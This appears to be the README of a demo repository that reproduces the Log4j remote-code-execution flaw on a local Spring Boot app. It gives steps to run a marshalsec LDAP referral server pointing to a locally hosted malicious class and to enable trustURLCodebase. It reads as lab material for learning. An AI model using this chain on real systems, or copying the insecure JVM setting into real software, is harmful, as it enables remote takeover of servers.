This code base has the code for reproducing the log4j vulnerability in the spring boot app.
- Clone this repo in to your local machine
git@github.com:dilipsundarraj1/log4j-exploit-demo.git
- Import the projects in to Intellij
- This will run the app in port 8080. Make sure you have this port available
-
Import the project in to Intellij
-
Build the project using Maven
- Build From Terminal, use the below command
mvn clean package -DskipTests
- Build in Intellij, use the below command
clean package -DskipTests
-
Run the below command to start up the ldap server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE"
- This should start up the LDAP server in port 1389
- Add the below System property in the GreetingsServiceApplication class
- This is to enable the LDAP call invocation in the JVM
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")
-
Import the hacker-remote-server module in intellj
-
Start the simple http server using the below command
python3 -m http.server
- hacker-remote-server
- This repo hosts the Compiled Java code which is the actual code that gets executed in the Target JVM
- marshalsec
- This repo holds the source code for spinning up an LDAP Server in our local